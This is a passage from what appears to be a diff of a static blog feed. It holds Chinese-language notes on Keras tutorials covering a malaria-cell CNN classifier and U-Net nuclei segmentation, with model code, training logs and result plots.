    dropout_116x16x3216x16x320
    flatten16x16x3216x16x32=81920
    dense81925125128192x512+512=4194816
    batch_normalization_25125122048
    dropout_25125120
    dense_1512256256512x256+256=131328
    batch_normalization_32562561024
    dropout_32562560
    dense_225622256x2+2=514

    • 设置测试集和训练集,开始训练
    1
    2
    3
    4
    5
    6
    7
    from sklearn.model_selection import train_test_split
    from keras.utils import to_categorical

    X_train, X_test, y_train, y_test = train_test_split(dataset,
    to_categorical(np.array(label)),
    test_size = 0.20,
    random_state = 0)
    1
    history = model.fit(np.array(X_train), y_train, batch_size=64, verbose=1, epochs=25, validation_split=0.1, shuffle=False)
    Epoch 1/2512/12 [==============================] - 9s 99ms/step - loss: 0.9405 - accuracy: 0.6444 - val_loss: 31.2568 - val_accuracy: 0.5625Epoch 2/2512/12 [==============================] - 0s 37ms/step - loss: 0.5048 - accuracy: 0.7472 - val_loss: 23.6857 - val_accuracy: 0.5625Epoch 3/2512/12 [==============================] - 0s 37ms/step - loss: 0.3281 - accuracy: 0.8417 - val_loss: 17.8224 - val_accuracy: 0.5625Epoch 4/2512/12 [==============================] - 0s 37ms/step - loss: 0.2036 - accuracy: 0.9250 - val_loss: 14.3039 - val_accuracy: 0.5625Epoch 5/2512/12 [==============================] - 0s 37ms/step - loss: 0.1568 - accuracy: 0.9431 - val_loss: 13.0039 - val_accuracy: 0.5625Epoch 6/2512/12 [==============================] - 0s 37ms/step - loss: 0.1074 - accuracy: 0.9694 - val_loss: 7.4553 - val_accuracy: 0.5625Epoch 7/2512/12 [==============================] - 0s 37ms/step - loss: 0.0858 - accuracy: 0.9778 - val_loss: 3.5444 - val_accuracy: 0.5500Epoch 8/2512/12 [==============================] - 0s 37ms/step - loss: 0.0608 - accuracy: 0.9819 - val_loss: 4.7493 - val_accuracy: 0.5500Epoch 9/2512/12 [==============================] - 0s 37ms/step - loss: 0.0632 - accuracy: 0.9764 - val_loss: 4.7916 - val_accuracy: 0.5625Epoch 10/2512/12 [==============================] - 0s 36ms/step - loss: 0.0432 - accuracy: 0.9889 - val_loss: 1.9020 - val_accuracy: 0.5875Epoch 11/2512/12 [==============================] - 0s 36ms/step - loss: 0.0489 - accuracy: 0.9847 - val_loss: 2.2950 - val_accuracy: 0.5750Epoch 12/2512/12 [==============================] - 0s 37ms/step - loss: 0.0458 - accuracy: 0.9861 - val_loss: 0.8035 - val_accuracy: 0.7625Epoch 13/2512/12 [==============================] - 0s 38ms/step - loss: 0.0264 - accuracy: 0.9958 - val_loss: 1.4798 - val_accuracy: 0.6500Epoch 14/2512/12 [==============================] - 0s 38ms/step - loss: 0.0244 - accuracy: 0.9931 - val_loss: 1.6248 - val_accuracy: 0.6625Epoch 15/2512/12 [==============================] - 0s 38ms/step - loss: 0.0160 - accuracy: 0.9958 - val_loss: 1.2913 - val_accuracy: 0.7125Epoch 16/2512/12 [==============================] - 0s 39ms/step - loss: 0.0169 - accuracy: 0.9958 - val_loss: 1.4256 - val_accuracy: 0.6875Epoch 17/2512/12 [==============================] - 0s 40ms/step - loss: 0.0114 - accuracy: 0.9986 - val_loss: 1.2699 - val_accuracy: 0.7000Epoch 18/2512/12 [==============================] - 0s 39ms/step - loss: 0.0158 - accuracy: 0.9972 - val_loss: 0.7563 - val_accuracy: 0.7875Epoch 19/2512/12 [==============================] - 0s 39ms/step - loss: 0.0133 - accuracy: 0.9972 - val_loss: 0.6219 - val_accuracy: 0.8500Epoch 20/2512/12 [==============================] - 0s 38ms/step - loss: 0.0194 - accuracy: 0.9958 - val_loss: 0.7935 - val_accuracy: 0.8500Epoch 21/2512/12 [==============================] - 0s 38ms/step - loss: 0.0174 - accuracy: 0.9972 - val_loss: 2.8081 - val_accuracy: 0.5625Epoch 22/2512/12 [==============================] - 0s 38ms/step - loss: 0.0188 - accuracy: 0.9931 - val_loss: 0.6510 - val_accuracy: 0.8000Epoch 23/2512/12 [==============================] - 0s 38ms/step - loss: 0.0340 - accuracy: 0.9903 - val_loss: 1.6654 - val_accuracy: 0.6250Epoch 24/2512/12 [==============================] - 0s 38ms/step - loss: 0.0248 - accuracy: 0.9931 - val_loss: 0.8992 - val_accuracy: 0.7625Epoch 25/2512/12 [==============================] - 0s 38ms/step - loss: 0.0201 - accuracy: 0.9917 - val_loss: 2.0561 - val_accuracy: 0.7250

    • 查看结果
    1
    print("Test_Accuracy: {:.2f}%".format(model.evaluate(np.array(X_test), np.array(y_test))[1]*100))
    7/7 [==============================] - 0s 17ms/step - loss: 1.7793 - accuracy: 0.6950Test_Accuracy: 69.50%
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    import matplotlib.pyplot as plt

    f, (ax1, ax2) = plt.subplots(1, 2, figsize=(12, 4))
    t = f.suptitle('CNN Performance', fontsize=12)
    f.subplots_adjust(top=0.85, wspace=0.3)

    # 绘制训练 & 验证的准确率值
    max_epoch = len(history.history['accuracy'])+1
    epoch_list = list(range(1,max_epoch))
    ax1.plot(epoch_list, history.history['accuracy'], label='Train Accuracy')
    ax1.plot(epoch_list, history.history['val_accuracy'], label='Validation Accuracy')
    ax1.set_xticks(np.arange(1, max_epoch, 5))
    ax1.set_ylabel('Accuracy Value')
    ax1.set_xlabel('Epoch')
    ax1.set_title('Accuracy')
    l1 = ax1.legend(loc="best")

    # 绘制训练 & 验证的损失值
    ax2.plot(epoch_list, history.history['loss'], label='Train Loss')
    ax2.plot(epoch_list, history.history['val_loss'], label='Validation Loss')
    ax2.set_xticks(np.arange(1, max_epoch, 5))
    ax2.set_ylabel('Loss Value')
    ax2.set_xlabel('Epoch')
    ax2.set_title('Loss')
    l2 = ax2.legend(loc="best")

    png

    可以推断出 epoch 次数过多,出现了过拟合现象。


    • 保存模型
    1
    model.save('malaria_cnn.h5')

    png

    ]]>
    @@ -8714,7 +8714,7 @@ /posts/DIP-Python%20tutorials%20for%20image%20processing%20and%20machine%20learning(73-78)-U-net/ - 正文

    73 - Image Segmentation using U-Net - Part1 -What is U-net-

    卷积神经网络的架构:

    png

    常见的卷积神经网络:

    png

    U-Net:

    png

    VGG 示意图及其代码:

    png

    U-Net architecture is designed for Semantic segmentation(语义分割)

    png

    74 - Image Segmentation using U-Net - Part 2 -Defining U-Net in Python using Keras-

    import tensorflow as tf

    IMG_WIDTH = 128
    IMG_HEIGHT = 128
    IMG_CHANNELS = 3

    建立模型

    inputs = tf.keras.layers.Input((IMG_HEIGHT, IMG_WIDTH, IMG_CHANNELS))
    s = tf.keras.layers.Lambda(lambda x: x / 255)(inputs) # 将整数转换成浮点数

    # Contraction path 收缩路径
    c1 = tf.keras.layers.Conv2D(16, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(s)
    c1 = tf.keras.layers.Dropout(0.1)(c1)
    c1 = tf.keras.layers.Conv2D(16, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c1)
    p1 = tf.keras.layers.MaxPooling2D((2, 2))(c1)

    c2 = tf.keras.layers.Conv2D(32, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(p1)
    c2 = tf.keras.layers.Dropout(0.1)(c2)
    c2 = tf.keras.layers.Conv2D(32, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c2)
    p2 = tf.keras.layers.MaxPooling2D((2, 2))(c2)

    c3 = tf.keras.layers.Conv2D(64, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(p2)
    c3 = tf.keras.layers.Dropout(0.2)(c3)
    c3 = tf.keras.layers.Conv2D(64, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c3)
    p3 = tf.keras.layers.MaxPooling2D((2, 2))(c3)

    c4 = tf.keras.layers.Conv2D(128, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(p3)
    c4 = tf.keras.layers.Dropout(0.2)(c4)
    c4 = tf.keras.layers.Conv2D(128, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c4)
    p4 = tf.keras.layers.MaxPooling2D(pool_size=(2, 2))(c4)

    c5 = tf.keras.layers.Conv2D(256, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(p4)
    c5 = tf.keras.layers.Dropout(0.3)(c5)
    c5 = tf.keras.layers.Conv2D(256, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c5)

    # Expansive path 延展路径
    u6 = tf.keras.layers.Conv2DTranspose(128, (2, 2), strides=(2, 2), padding='same')(c5)
    u6 = tf.keras.layers.concatenate([u6, c4])
    c6 = tf.keras.layers.Conv2D(128, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(u6)
    c6 = tf.keras.layers.Dropout(0.2)(c6)
    c6 = tf.keras.layers.Conv2D(128, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c6)

    u7 = tf.keras.layers.Conv2DTranspose(64, (2, 2), strides=(2, 2), padding='same')(c6)
    u7 = tf.keras.layers.concatenate([u7, c3])
    c7 = tf.keras.layers.Conv2D(64, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(u7)
    c7 = tf.keras.layers.Dropout(0.2)(c7)
    c7 = tf.keras.layers.Conv2D(64, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c7)

    u8 = tf.keras.layers.Conv2DTranspose(32, (2, 2), strides=(2, 2), padding='same')(c7)
    u8 = tf.keras.layers.concatenate([u8, c2])
    c8 = tf.keras.layers.Conv2D(32, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(u8)
    c8 = tf.keras.layers.Dropout(0.1)(c8)
    c8 = tf.keras.layers.Conv2D(32, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c8)

    u9 = tf.keras.layers.Conv2DTranspose(16, (2, 2), strides=(2, 2), padding='same')(c8)
    u9 = tf.keras.layers.concatenate([u9, c1], axis=3)
    c9 = tf.keras.layers.Conv2D(16, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(u9)
    c9 = tf.keras.layers.Dropout(0.1)(c9)
    c9 = tf.keras.layers.Conv2D(16, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c9)

    outputs = tf.keras.layers.Conv2D(1, (1, 1), activation='sigmoid')(c9)

    model = tf.keras.Model(inputs=[inputs], outputs=[outputs])
    model.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy'])
    model.summary()
    Model: "model"__________________________________________________________________________________________________ Layer (type)                   Output Shape         Param #     Connected to                     ================================================================================================== input_2 (InputLayer)           [(None, 128, 128, 3  0           []                                                               )]                                                                                                                                                                   lambda (Lambda)                (None, 128, 128, 3)  0           ['input_2[0][0]']                                                                                                                   conv2d (Conv2D)                (None, 128, 128, 16  448         ['lambda[0][0]']                                                 )                                                                                                                                                                    dropout (Dropout)              (None, 128, 128, 16  0           ['conv2d[0][0]']                                                 )                                                                                                                                                                    conv2d_1 (Conv2D)              (None, 128, 128, 16  2320        ['dropout[0][0]']                                                )                                                                                                                                                                    max_pooling2d (MaxPooling2D)   (None, 64, 64, 16)   0           ['conv2d_1[0][0]']                                                                                                                  conv2d_2 (Conv2D)              (None, 64, 64, 32)   4640        ['max_pooling2d[0][0]']                                                                                                             dropout_1 (Dropout)            (None, 64, 64, 32)   0           ['conv2d_2[0][0]']                                                                                                                  conv2d_3 (Conv2D)              (None, 64, 64, 32)   9248        ['dropout_1[0][0]']                                                                                                                 max_pooling2d_1 (MaxPooling2D)  (None, 32, 32, 32)  0           ['conv2d_3[0][0]']                                                                                                                  conv2d_4 (Conv2D)              (None, 32, 32, 64)   18496       ['max_pooling2d_1[0][0]']                                                                                                           dropout_2 (Dropout)            (None, 32, 32, 64)   0           ['conv2d_4[0][0]']                                                                                                                  conv2d_5 (Conv2D)              (None, 32, 32, 64)   36928       ['dropout_2[0][0]']                                                                                                                 max_pooling2d_2 (MaxPooling2D)  (None, 16, 16, 64)  0           ['conv2d_5[0][0]']                                                                                                                  conv2d_6 (Conv2D)              (None, 16, 16, 128)  73856       ['max_pooling2d_2[0][0]']                                                                                                           dropout_3 (Dropout)            (None, 16, 16, 128)  0           ['conv2d_6[0][0]']                                                                                                                  conv2d_7 (Conv2D)              (None, 16, 16, 128)  147584      ['dropout_3[0][0]']                                                                                                                 max_pooling2d_3 (MaxPooling2D)  (None, 8, 8, 128)   0           ['conv2d_7[0][0]']                                                                                                                  conv2d_8 (Conv2D)              (None, 8, 8, 256)    295168      ['max_pooling2d_3[0][0]']                                                                                                           dropout_4 (Dropout)            (None, 8, 8, 256)    0           ['conv2d_8[0][0]']                                                                                                                  conv2d_9 (Conv2D)              (None, 8, 8, 256)    590080      ['dropout_4[0][0]']                                                                                                                 conv2d_transpose (Conv2DTransp  (None, 16, 16, 128)  131200     ['conv2d_9[0][0]']                ose)                                                                                                                                                                                                concatenate (Concatenate)      (None, 16, 16, 256)  0           ['conv2d_transpose[0][0]',                                                                         'conv2d_7[0][0]']                                                                                                                  conv2d_10 (Conv2D)             (None, 16, 16, 128)  295040      ['concatenate[0][0]']                                                                                                               dropout_5 (Dropout)            (None, 16, 16, 128)  0           ['conv2d_10[0][0]']                                                                                                                 conv2d_11 (Conv2D)             (None, 16, 16, 128)  147584      ['dropout_5[0][0]']                                                                                                                 conv2d_transpose_1 (Conv2DTran  (None, 32, 32, 64)  32832       ['conv2d_11[0][0]']               spose)                                                                                                                                                                                              concatenate_1 (Concatenate)    (None, 32, 32, 128)  0           ['conv2d_transpose_1[0][0]',                                                                       'conv2d_5[0][0]']                                                                                                                  conv2d_12 (Conv2D)             (None, 32, 32, 64)   73792       ['concatenate_1[0][0]']                                                                                                             dropout_6 (Dropout)            (None, 32, 32, 64)   0           ['conv2d_12[0][0]']                                                                                                                 conv2d_13 (Conv2D)             (None, 32, 32, 64)   36928       ['dropout_6[0][0]']                                                                                                                 conv2d_transpose_2 (Conv2DTran  (None, 64, 64, 32)  8224        ['conv2d_13[0][0]']               spose)                                                                                                                                                                                              concatenate_2 (Concatenate)    (None, 64, 64, 64)   0           ['conv2d_transpose_2[0][0]',                                                                       'conv2d_3[0][0]']                                                                                                                  conv2d_14 (Conv2D)             (None, 64, 64, 32)   18464       ['concatenate_2[0][0]']                                                                                                             dropout_7 (Dropout)            (None, 64, 64, 32)   0           ['conv2d_14[0][0]']                                                                                                                 conv2d_15 (Conv2D)             (None, 64, 64, 32)   9248        ['dropout_7[0][0]']                                                                                                                 conv2d_transpose_3 (Conv2DTran  (None, 128, 128, 16  2064       ['conv2d_15[0][0]']               spose)                         )                                                                                                                                                                    concatenate_3 (Concatenate)    (None, 128, 128, 32  0           ['conv2d_transpose_3[0][0]',                                     )                                 'conv2d_1[0][0]']                                                                                                                  conv2d_16 (Conv2D)             (None, 128, 128, 16  4624        ['concatenate_3[0][0]']                                          )                                                                                                                                                                    dropout_8 (Dropout)            (None, 128, 128, 16  0           ['conv2d_16[0][0]']                                              )                                                                                                                                                                    conv2d_17 (Conv2D)             (None, 128, 128, 16  2320        ['dropout_8[0][0]']                                              )                                                                                                                                                                    conv2d_18 (Conv2D)             (None, 128, 128, 1)  17          ['conv2d_17[0][0]']                                                                                                                ==================================================================================================Total params: 1,941,105Trainable params: 1,941,105Non-trainable params: 0__________________________________________________________________________________________________
    from tensorflow.keras import utils
    from keras.utils.vis_utils import model_to_dot

    utils.plot_model(model, 'model1.png',show_shapes=True,show_dtype=True,show_layer_names=True)

    png

    75 - Image Segmentation using U-Net - Part 3 -What are trainable parameters-

    ​ 介绍了神经网络中参数量是怎么算的。

    76 - Image Segmentation using U-Net - Part 4 -Model fitting- checkpoints- and callbacks-

    Modelcheckpoint

    checkpointer = tf.keras.callbacks.ModelCheckpoint('model_for_nuclei.h5', verbose=1, save_best_only=True)
    callbacks = [
    tf.keras.callbacks.EarlyStopping(patience=2, monitor='val_loss'),
    tf.keras.callbacks.TensorBoard(log_dir='logs')
    ]

    77 - Image Segmentation using U-Net - Part 5 -Understanding the data-

    获取数据集:2018 Data Science Bowl | Kaggle

    78 - Image Segmentation using U-Net - Part 6 -Running the code and understanding results-

    import tensorflow as tf
    import os
    import numpy as np

    IMG_WIDTH = 128
    IMG_HEIGHT = 128
    IMG_CHANNELS = 3

    TRAIN_PATH = 'stage1_train/'
    TEST_PATH = 'stage1_test/'

    train_ids = next(os.walk(TRAIN_PATH))[1]
    test_ids = next(os.walk(TEST_PATH))[1]

    X_train = np.zeros((len(train_ids), IMG_HEIGHT, IMG_WIDTH, IMG_CHANNELS), dtype=np.uint8)
    Y_train = np.zeros((len(train_ids), IMG_HEIGHT, IMG_WIDTH, 1), dtype=np.bool_) # y 是一个二值图像

    Resizing training images and masks

    import random
    from tqdm import tqdm
    from skimage.io import imread, imshow
    from skimage.transform import resize
    import matplotlib.pyplot as plt

    seed = 42
    np.random.seed = seed

    print('Resizing training images and masks')
    for n, id_ in tqdm(enumerate(train_ids), total=len(train_ids)):
    path = TRAIN_PATH + id_
    img = imread(path + '/images/' + id_ + '.png')[:,:,:IMG_CHANNELS] # 读取图像
    img = resize(img, (IMG_HEIGHT, IMG_WIDTH), mode='constant', preserve_range=True) # 将图像大小修改为 128x128
    X_train[n] = img # Fill empty X_train with values from img
    mask = np.zeros((IMG_HEIGHT, IMG_WIDTH, 1), dtype=np.bool_)
    for mask_file in next(os.walk(path + '/masks/'))[2]:
    mask_ = imread(path + '/masks/' + mask_file)
    mask_ = np.expand_dims(resize(mask_, (IMG_HEIGHT, IMG_WIDTH), mode='constant',
    preserve_range=True), axis=-1)
    mask = np.maximum(mask, mask_)

    Y_train[n] = mask # Fill empty Y_train with values from img
    Resizing training images and masks100%|██████████| 670/670 [04:38<00:00,  2.41it/s]

    Resizing test images

    X_test = np.zeros((len(test_ids), IMG_HEIGHT, IMG_WIDTH, IMG_CHANNELS), dtype=np.uint8)
    sizes_test = []
    print('Resizing test images')
    for n, id_ in tqdm(enumerate(test_ids), total=len(test_ids)):
    path = TEST_PATH + id_
    img = imread(path + '/images/' + id_ + '.png')[:,:,:IMG_CHANNELS]
    sizes_test.append([img.shape[0], img.shape[1]])
    img = resize(img, (IMG_HEIGHT, IMG_WIDTH), mode='constant', preserve_range=True)
    X_test[n] = img

    print('Done!')
    Resizing test images100%|██████████| 65/65 [00:01<00:00, 50.05it/s]Done!


    image_x = random.randint(0, len(train_ids))
    imshow(X_train[image_x])
    plt.show()

    png

    imshow(np.squeeze(Y_train[image_x]))
    plt.show()

    png

    inputs = tf.keras.layers.Input((IMG_HEIGHT, IMG_WIDTH, IMG_CHANNELS))
    s = tf.keras.layers.Lambda(lambda x: x / 255)(inputs) # 将整数转换成浮点数

    # Contraction path 收缩路径
    c1 = tf.keras.layers.Conv2D(16, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(s)
    c1 = tf.keras.layers.Dropout(0.1)(c1)
    c1 = tf.keras.layers.Conv2D(16, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c1)
    p1 = tf.keras.layers.MaxPooling2D((2, 2))(c1)

    c2 = tf.keras.layers.Conv2D(32, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(p1)
    c2 = tf.keras.layers.Dropout(0.1)(c2)
    c2 = tf.keras.layers.Conv2D(32, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c2)
    p2 = tf.keras.layers.MaxPooling2D((2, 2))(c2)

    c3 = tf.keras.layers.Conv2D(64, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(p2)
    c3 = tf.keras.layers.Dropout(0.2)(c3)
    c3 = tf.keras.layers.Conv2D(64, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c3)
    p3 = tf.keras.layers.MaxPooling2D((2, 2))(c3)

    c4 = tf.keras.layers.Conv2D(128, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(p3)
    c4 = tf.keras.layers.Dropout(0.2)(c4)
    c4 = tf.keras.layers.Conv2D(128, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c4)
    p4 = tf.keras.layers.MaxPooling2D(pool_size=(2, 2))(c4)

    c5 = tf.keras.layers.Conv2D(256, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(p4)
    c5 = tf.keras.layers.Dropout(0.3)(c5)
    c5 = tf.keras.layers.Conv2D(256, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c5)

    # Expansive path 延展路径
    u6 = tf.keras.layers.Conv2DTranspose(128, (2, 2), strides=(2, 2), padding='same')(c5)
    u6 = tf.keras.layers.concatenate([u6, c4])
    c6 = tf.keras.layers.Conv2D(128, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(u6)
    c6 = tf.keras.layers.Dropout(0.2)(c6)
    c6 = tf.keras.layers.Conv2D(128, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c6)

    u7 = tf.keras.layers.Conv2DTranspose(64, (2, 2), strides=(2, 2), padding='same')(c6)
    u7 = tf.keras.layers.concatenate([u7, c3])
    c7 = tf.keras.layers.Conv2D(64, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(u7)
    c7 = tf.keras.layers.Dropout(0.2)(c7)
    c7 = tf.keras.layers.Conv2D(64, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c7)

    u8 = tf.keras.layers.Conv2DTranspose(32, (2, 2), strides=(2, 2), padding='same')(c7)
    u8 = tf.keras.layers.concatenate([u8, c2])
    c8 = tf.keras.layers.Conv2D(32, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(u8)
    c8 = tf.keras.layers.Dropout(0.1)(c8)
    c8 = tf.keras.layers.Conv2D(32, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c8)

    u9 = tf.keras.layers.Conv2DTranspose(16, (2, 2), strides=(2, 2), padding='same')(c8)
    u9 = tf.keras.layers.concatenate([u9, c1], axis=3)
    c9 = tf.keras.layers.Conv2D(16, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(u9)
    c9 = tf.keras.layers.Dropout(0.1)(c9)
    c9 = tf.keras.layers.Conv2D(16, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c9)

    outputs = tf.keras.layers.Conv2D(1, (1, 1), activation='sigmoid')(c9)

    model = tf.keras.Model(inputs=[inputs], outputs=[outputs])
    model.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy'])

    Modelcheckpoint

    checkpointer = tf.keras.callbacks.ModelCheckpoint('model_for_nuclei.h5', verbose=1, save_best_only=True)
    callbacks = [
    tf.keras.callbacks.EarlyStopping(patience=2, monitor='val_loss'),
    tf.keras.callbacks.TensorBoard(log_dir='logs')
    ]
    results = model.fit(X_train, Y_train, validation_split=0.1, batch_size=16, epochs=25, callbacks=callbacks)
    Epoch 1/2538/38 [==============================] - 20s 280ms/step - loss: 0.5785 - accuracy: 0.7459 - val_loss: 0.3360 - val_accuracy: 0.7809Epoch 2/2538/38 [==============================] - 7s 173ms/step - loss: 0.2739 - accuracy: 0.8642 - val_loss: 0.2158 - val_accuracy: 0.9125Epoch 3/2538/38 [==============================] - 7s 174ms/step - loss: 0.1924 - accuracy: 0.9304 - val_loss: 0.1558 - val_accuracy: 0.9406Epoch 4/2538/38 [==============================] - 7s 173ms/step - loss: 0.1589 - accuracy: 0.9422 - val_loss: 0.1474 - val_accuracy: 0.9425Epoch 5/2538/38 [==============================] - 7s 175ms/step - loss: 0.1449 - accuracy: 0.9472 - val_loss: 0.1173 - val_accuracy: 0.9543Epoch 6/2538/38 [==============================] - 7s 176ms/step - loss: 0.1394 - accuracy: 0.9480 - val_loss: 0.1090 - val_accuracy: 0.9565Epoch 7/2538/38 [==============================] - 7s 176ms/step - loss: 0.1246 - accuracy: 0.9540 - val_loss: 0.1084 - val_accuracy: 0.9579Epoch 8/2538/38 [==============================] - 7s 177ms/step - loss: 0.1204 - accuracy: 0.9553 - val_loss: 0.1113 - val_accuracy: 0.9577Epoch 9/2538/38 [==============================] - 7s 177ms/step - loss: 0.1124 - accuracy: 0.9581 - val_loss: 0.0957 - val_accuracy: 0.9611Epoch 10/2538/38 [==============================] - 7s 177ms/step - loss: 0.1087 - accuracy: 0.9591 - val_loss: 0.0930 - val_accuracy: 0.9618Epoch 11/2538/38 [==============================] - 7s 179ms/step - loss: 0.1079 - accuracy: 0.9593 - val_loss: 0.0892 - val_accuracy: 0.9650Epoch 12/2538/38 [==============================] - 7s 179ms/step - loss: 0.1044 - accuracy: 0.9605 - val_loss: 0.0918 - val_accuracy: 0.9643Epoch 13/2538/38 [==============================] - 7s 180ms/step - loss: 0.1021 - accuracy: 0.9608 - val_loss: 0.0888 - val_accuracy: 0.9651Epoch 14/2538/38 [==============================] - 7s 180ms/step - loss: 0.0989 - accuracy: 0.9621 - val_loss: 0.0950 - val_accuracy: 0.9616Epoch 15/2538/38 [==============================] - 7s 180ms/step - loss: 0.1003 - accuracy: 0.9612 - val_loss: 0.0858 - val_accuracy: 0.9661Epoch 16/2538/38 [==============================] - 7s 180ms/step - loss: 0.1005 - accuracy: 0.9613 - val_loss: 0.0872 - val_accuracy: 0.9660Epoch 17/2538/38 [==============================] - 7s 181ms/step - loss: 0.0963 - accuracy: 0.9630 - val_loss: 0.0846 - val_accuracy: 0.9659Epoch 18/2538/38 [==============================] - 7s 184ms/step - loss: 0.0956 - accuracy: 0.9632 - val_loss: 0.0840 - val_accuracy: 0.9665Epoch 19/2538/38 [==============================] - 7s 183ms/step - loss: 0.0925 - accuracy: 0.9642 - val_loss: 0.0819 - val_accuracy: 0.9675Epoch 20/2538/38 [==============================] - 7s 183ms/step - loss: 0.0927 - accuracy: 0.9640 - val_loss: 0.0833 - val_accuracy: 0.9677Epoch 21/2538/38 [==============================] - 7s 183ms/step - loss: 0.0917 - accuracy: 0.9641 - val_loss: 0.0846 - val_accuracy: 0.9660
    idx = random.randint(0, len(X_train))

    preds_train = model.predict(X_train[:int(X_train.shape[0]*0.9)], verbose=1)
    preds_val = model.predict(X_train[int(X_train.shape[0]*0.9):], verbose=1)
    preds_test = model.predict(X_test, verbose=1)

    preds_train_t = (preds_train > 0.5).astype(np.uint8)
    preds_val_t = (preds_val > 0.5).astype(np.uint8)
    preds_test_t = (preds_test > 0.5).astype(np.uint8)
    19/19 [==============================] - 5s 161ms/step3/3 [==============================] - 0s 91ms/step3/3 [==============================] - 1s 417ms/step

    Perform a sanity check on some random training samples

    • 对一些随机训练样本进行合理性检查
    ix = random.randint(0, len(preds_train_t))
    imshow(X_train[ix])
    plt.show()
    imshow(np.squeeze(Y_train[ix]))
    plt.show()
    imshow(np.squeeze(preds_train_t[ix]))
    plt.show()

    png

    png

    C:\Users\gzjzx\anaconda3\lib\site-packages\skimage\io\_plugins\matplotlib_plugin.py:150: UserWarning: Low image data range; displaying image with stretched contrast.  lo, hi, cmap = _get_display_range(image)

    png

    Perform a sanity check on some random validation samples

    • 对一些随机的验证样本进行合理性检查
    ix = random.randint(0, len(preds_val_t))
    imshow(X_train[int(X_train.shape[0]*0.9):][ix])
    plt.show()
    imshow(np.squeeze(Y_train[int(Y_train.shape[0]*0.9):][ix]))
    plt.show()
    imshow(np.squeeze(preds_val_t[ix]))
    plt.show()

    png

    png

    png

    可视化结果

    !tensorboard --logdir=logs/ --host localhost --port 8088

    png

    ]]>
    + 正文

    73 - Image Segmentation using U-Net - Part1 -What is U-net-

    卷积神经网络的架构:

    png

    常见的卷积神经网络:

    png

    U-Net:

    png

    VGG 示意图及其代码:

    png

    U-Net architecture is designed for Semantic segmentation(语义分割)

    png

    74 - Image Segmentation using U-Net - Part 2 -Defining U-Net in Python using Keras-

    1
    2
    3
    4
    5
    import tensorflow as tf

    IMG_WIDTH = 128
    IMG_HEIGHT = 128
    IMG_CHANNELS = 3

    建立模型

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    inputs = tf.keras.layers.Input((IMG_HEIGHT, IMG_WIDTH, IMG_CHANNELS))
    s = tf.keras.layers.Lambda(lambda x: x / 255)(inputs) # 将整数转换成浮点数

    # Contraction path 收缩路径
    c1 = tf.keras.layers.Conv2D(16, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(s)
    c1 = tf.keras.layers.Dropout(0.1)(c1)
    c1 = tf.keras.layers.Conv2D(16, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c1)
    p1 = tf.keras.layers.MaxPooling2D((2, 2))(c1)

    c2 = tf.keras.layers.Conv2D(32, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(p1)
    c2 = tf.keras.layers.Dropout(0.1)(c2)
    c2 = tf.keras.layers.Conv2D(32, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c2)
    p2 = tf.keras.layers.MaxPooling2D((2, 2))(c2)

    c3 = tf.keras.layers.Conv2D(64, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(p2)
    c3 = tf.keras.layers.Dropout(0.2)(c3)
    c3 = tf.keras.layers.Conv2D(64, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c3)
    p3 = tf.keras.layers.MaxPooling2D((2, 2))(c3)

    c4 = tf.keras.layers.Conv2D(128, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(p3)
    c4 = tf.keras.layers.Dropout(0.2)(c4)
    c4 = tf.keras.layers.Conv2D(128, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c4)
    p4 = tf.keras.layers.MaxPooling2D(pool_size=(2, 2))(c4)

    c5 = tf.keras.layers.Conv2D(256, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(p4)
